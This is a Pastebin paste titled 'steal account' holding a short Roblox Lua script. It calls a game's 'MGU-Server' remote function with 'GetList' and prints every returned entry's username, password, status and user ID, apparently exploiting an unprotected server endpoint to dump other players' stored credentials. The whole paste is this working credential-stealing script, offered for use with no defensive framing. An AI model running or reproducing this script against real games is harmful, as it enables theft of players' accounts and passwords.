Advertisement
Guest User

steal account

a guest
Apr 8th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.39 KB | None | 0 0
  1. local server = game:WaitForChild("ReplicatedStorage"):WaitForChild("MGU-Server")
  2. local config = server:InvokeServer("GetCustomParameters")
  3. function ShowDetails(data)
  4. print("User: "..data.UserName)
  5. print("Pass: "..data.UserPass)
  6. print("Status: "..data.Type)
  7. print("ID: "..tostring(data.UserID))
  8. end
  9. local list = server:InvokeServer("GetList")
  10. for i,data in pairs(list) do
  11. ShowDetails(data)
  12. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement